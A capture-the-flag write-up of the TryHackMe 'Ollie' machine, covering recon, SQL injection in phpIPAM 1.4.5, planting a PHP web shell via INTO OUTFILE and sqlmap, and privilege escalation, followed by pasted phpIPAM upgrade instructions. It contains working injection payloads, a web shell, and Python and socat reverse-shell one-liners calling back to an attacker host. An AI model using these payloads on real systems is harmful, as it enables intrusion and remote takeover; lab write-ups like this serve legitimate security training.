Month: July 2022
Protected: htb-redPanda-private
thm-ollie
Ollie – Write Up
Reconn
Hey! Welcome back to another TryHackMe machine!
Today we are pwning another 0day machine!
As in every machine, we start with the reconn phase!
gobuster lead to db to nowhere
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -b 404 -u http://10.10.79.229
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.79.229
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2022/07/08 09:39:09 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.79.229/.hta (Status: 403) [Size: 277]
http://10.10.79.229/.htaccess (Status: 403) [Size: 277]
http://10.10.79.229/.htpasswd (Status: 403) [Size: 277]
http://10.10.79.229/api (Status: 301) [Size: 310] [--> http://10.10.79.229/api/]
http://10.10.79.229/app (Status: 301) [Size: 310] [--> http://10.10.79.229/app/]
http://10.10.79.229/css/]
http://10.10.79.229/db (Status: 301) [Size: 309] [--> http://10.10.79.229/db/]
There’s an strange service running on port 1337
(Leet :D). It’s a common port used in CTFs and by pentesters as it’s making a reference to Leet speak
Let’s use nc
to connect to this port…
Let’s login!
Foothold – User
So after a (long) reconnaissance phase, we found that the platform running is phpIPAM IP address management [v1.4.5]
The issue here is that there is an exploit for the older version (1.4.4) of this software where they claim that this issue was fixed in the latest version…
Well…
Spoiler: seems like it’s not
Here is the exploit POC we used as a guide: https://fluidattacks.com/advisories/mercury/
Basically we need to make a search when mapping a new subnet, to exploit an SQL Injection
.
This is the exploit used to test if it is vulnerable or not:
" union select @@version,2,user(),4 -- -
or
" union select user(),1,1,load_file('/etc/passwd') --
We used it here and got this output:
As you can see, we can exploit an SQLI
here, and we have the version and user running the DB
8.0.28-0ubuntu0.20.04.3/phpipam_ollie@localhost (4)
Cool! Let’s do more manual reconnaissance within the database, let’s see if our user phpipam_ollie
is able to write a file!
Exploit used: " union all select 1,2,3,group_concat(user,0x3a,file_priv) from mysql.user -- -
ollie_mysql:Y,phpipam_ollie:Y
Yes! The user is able to write files!!
So to exploit this, we encoded a simple PHP payload to HEX:
https://www.online-toolz.com/tools/text-hex-convertor.php
<?php system($_GET["cmd"]); ?>
And added it to our exploit:
" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- -
We got an error, but let’s see if it was uploaded…
Let’s establish a reverse shell connection
, and start the reconn phase again to get root!
Let’s try the easiest way to escalate privileges: Password Reuse attack!
It worked! Ollie uses the same password for the server and Administration panel!
Root
To make out our way to root, we need to enumerate the machine once again, we used LinPeas
but nothing caught our attention, but we used timeout 60s./pspy64
Let’s see what’s up with it…
python3 -c 'import pty;pty.spawn("bash")'
CTRL-Z
stty raw -echo; fg
reset Terminal Type? screen
export TERM=xterm-256color
Seems like a binary owned by root
, but the with the group of ollie
and we have read and write permissions!
Let’s add an exploit to it, so we can have a reverse shell connection
as root
!
Let’s set up the listener and wait for the connection!
That’s all
Beyond ROOT
why we are able to save files ( non default mysql setting )
root@hackerdog:/etc/mysql/mysql.conf.d#
cat mysqld.cnf
cat mysqld.cnf
#
# The MySQL database server configuration file.
--snip--
# http://dev.mysql.com/doc/mysql/en/server-system-variables.html
# Here is entries for some specific programs
# The following values assume you have at least 32M ram
[mysqld]
#
# * Basic Settings
#
user = mysql
# pid-file = /var/run/mysqld/mysqld.pid
# socket = /var/run/mysqld/mysqld.sock
# port = 3306
# datadir = /var/lib/mysql
secure_file_priv="/"
--snip--
.
┌─[puck@parrot-lt]─[~/thm/ollie] └──╼ $
ssh root@10.10.115.200
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-99-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 07 Jul 2022 12:53:52 PM UTC
System load: 0.0 Processes: 151
Usage of /: 64.2% of 9.78GB Users logged in: 0
Memory usage: 37% IPv4 address for docker0: 172.17.0.1
Swap usage: 0% IPv4 address for eth0: 10.10.115.200
6 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Feb 12 15:49:15 2022
root@hackerdog:~# docker image list
REPOSITORY TAG IMAGE ID CREATED SIZE
olliebot latest 3bb28301dbba 4 months ago 48.4MB
root@hackerdog:~# crontab -l
no crontab for root
root@hackerdog:~# crontab -l -u ollie
no crontab for ollie
root@hackerdog:~#
Other ways:
https://www.exploit-db.com/exploits/50963
┌─[✗]─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $python3 50963.py -url http://10.10.79.250 -usr admin -pwd O[redacted]y! -cmd id
█▀█ █░█ █▀█ █ █▀█ ▄▀█ █▀▄▀█ ▄█ ░ █░█ ░ █▀ █▀ █▀█ █░░ █ ▀█▀ █▀█ █▀█ █▀▀ █▀▀
█▀▀ █▀█ █▀▀ █ █▀▀ █▀█ █░▀░█ ░█ ▄ ▀▀█ ▄ ▄█ ▄█ ▀▀█ █▄▄ █ ░█░ █▄█ █▀▄ █▄▄ ██▄
█▄▄ █▄█ █▄▄ █▀▀ █░█ █ █▄░█ █▀▄ █▄█ █▀ █▀▀ █▀▀
█▄█ ░█░ █▄█ ██▄ █▀█ █ █░▀█ █▄▀ ░█░ ▄█ ██▄ █▄▄
[...] Trying to log in as admin
[+] Login successful!
[...] Exploiting
[+] Success! The shell is located at http://10.10.79.250/evil.php. Parameter: cmd
[+] Output:
1 uid=33(www-data) gid=33(www-data) groups=33(www-data)
3 4
┌─[puck@parrot-lt]─[~/thm/ollie]
.
sqlmap
.
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $cat request.txt
POST /app/admin/routing/edit-bgp-mapping-search.php HTTP/1.1
Host: 10.10.79.229
Content-Length: 68
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.10.79.229
Referer: http://10.10.79.229/index.php?page=administration§ion=routing&subnetId=bgp&sPage=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpipam=oqrblblmjlutf187oee7dh63q8; table-page-size=50
Connection: close
subnet=test&bgp_id=2
┌─[puck@parrot-lt]─[~/thm/ollie]
.
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $sqlmap -r request.txt --file-write=rev.php --file-dest=/var/www/html/rev.php --batch
___
__H__
___ ___[,]_____ ___ ___ {1.6.4#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:29:48 /2022-07-08/
[08:29:48] [INFO] parsing HTTP request from 'request.txt'
[08:29:48] [INFO] testing connection to the target URL
[08:29:48] [INFO] testing if the target URL content is stable
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[08:29:48] [INFO] target URL content is stable
[08:29:48] [INFO] testing if POST parameter 'subnet' is dynamic
[08:29:48] [WARNING] POST parameter 'subnet' does not appear to be dynamic
[08:29:48] [INFO] heuristic (basic) test shows that POST parameter 'subnet' might be injectable (possible DBMS: 'MySQL')
[08:29:49] [INFO] testing for SQL injection on POST parameter 'subnet'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[08:29:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:29:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[08:29:49] [INFO] testing 'Generic inline queries'
[08:29:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[08:29:50] [WARNING] reflective value(s) found and filtering out
[08:29:51] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[08:29:52] [INFO] POST parameter 'subnet' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="10.10.0.0/16 (Business customers)")
[08:29:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:29:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:29:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:29:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:29:52] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[08:29:52] [INFO] POST parameter 'subnet' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[08:29:52] [INFO] testing 'MySQL inline queries'
[08:29:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[08:30:02] [INFO] POST parameter 'subnet' appears to be 'MySQL >= 5.0.12 stacked queries (comment)' injectable
[08:30:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:30:12] [INFO] POST parameter 'subnet' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[08:30:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:30:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:30:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:30:12] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[08:30:13] [INFO] target URL appears to have 4 columns in query
[08:30:13] [INFO] POST parameter 'subnet' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[08:30:13] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'subnet' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 87 HTTP(s) requests:
---
Parameter: subnet (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: subnet=-9472" OR 7217=7217#&bgp_id=2
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: subnet=test" AND GTID_SUBSET(CONCAT(0x7171627671,(SELECT (ELT(8609=8609,1))),0x717a6a7171),8609)-- Nngn&bgp_id=2
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: subnet=test";SELECT SLEEP(5)#&bgp_id=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: subnet=test" AND (SELECT 8032 FROM (SELECT(SLEEP(5)))UEUE)-- bIqT&bgp_id=2
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: subnet=test" UNION ALL SELECT NULL,NULL,CONCAT(0x7171627671,0x65704e6267576745697a41717a445a68676d5a6c6b75754f5944637376545a6f6175457155686d74,0x717a6a7171),NULL#&bgp_id=2
---
[08:30:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.6
[08:30:13] [INFO] fingerprinting the back-end DBMS operating system
[08:30:13] [INFO] the back-end DBMS operating system is Linux
[08:30:14] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want confirmation that the local file 'rev.php' has been successfully written on the back-end DBMS file system ('/var/www/html/rev.php')? [Y/n] Y
[08:30:14] [INFO] the local file 'rev.php' and the remote file '/var/www/html/rev.php' have the same size (32 B)
[08:30:14] [INFO] fetched data logged to text files under '/home/puck/.local/share/sqlmap/output/10.10.79.229'
[*] ending @ 08:30:14 /2022-07-08/
┌─[puck@parrot-lt]─[~/thm/ollie]
.
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $curl http://10.10.79.229/rev.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $
.
direct shell from browser
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.1.91",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌─[puck@parrot-lt]─[~/thm]
└──╼ $nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.9.1.91] from (UNKNOWN) [10.10.79.229] 47654
/bin/sh: 0: can't access tty; job control turned off
$ hostname
hackerdog
$
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $curl http://10.10.79.229/rev.php?cmd=socat%20exec:%27bash%20-li%27,pty,stderr,setsid,sigint,sane%20tcp:10.9.1.91:4242
.
┌─[puck@parrot-lt]─[~/thm/ollie]
└──╼ $socat file:`tty`,raw,echo=0 TCP-L:4242
www-data@hackerdog:/var/www/html$
…
Upgrading phpipam
In general upgrading phpipam is a process that contains 3 separate steps:
- Backup database and config.php file
- Upgrade phpIPAM code
- Upgrade phpIPAM database
1.) Create backup
Database part is separated from code, so in case you have a backup SQL file from old installation you can always restore if anything goes wrong in process. Before you make an upgrade make sure you backup your SQL database doing following steps (adjust directories etc. according to your installation):
[root@ipam /]# cd /var/www/html/phpipam/
[root@ipam /var/www/phpipam]# mysqldump -u root -p phpipam > phpipam_migration_backup.db
* if you want to restore
root@ipam:/opt# mysql -u root -p phpipam < phpipam_migration_backup.db
Enter password:
root@ipam:/opt#
Also backup config.php file containing settings for database connection to phpipam.
2.) Upgrade phpIPAM code
Simply extract new code and copy over old config.php file.
[root@ipam /]# cd /var/www/html [root@ipam /var/www/html]# tar -tvf phpipam-v1.4.7.tgz [root@ipam /var/www/html]# tar -xvf phpipam-v1.4.7.tgz [root@ipam /var/www/html]# cp /backup/location/config.php /var/www
In case you use Git upgrade is even easier:
root@ipam /]# cd /var/www/phpipam root@ipam /var/www/phpipam]# git pull root@ipam /var/www/phpipam]# git checkout -b 1.5 origin/1.5 root@ipam /var/www/phpipam]# git submodule update --init --recursive
3.) Upgrade phpIPAM database
To upgrade your phpipam database to latest version 3 options are possible and presented in upgrade screen in browser:
a) Automatic database upgrade
Open browser and follow upgrade procedure.
b) Manualy query import
In case you have some problems you can manually import each SQL update statement directly to MySQL database. All upgrade queries are available in db/UPDATE.sql file, start from statement that contains version higher than current one you are using.
Restore old installation and database
In case anything goes wrong the restore procedure is simple:
- Extract old code (from version you have prior to upgrade)
- Copy over config.php
- Load old database you backed up before starting upgrade (
mysql -u root -p < db/bkp/phpipam_migration_backup.db
)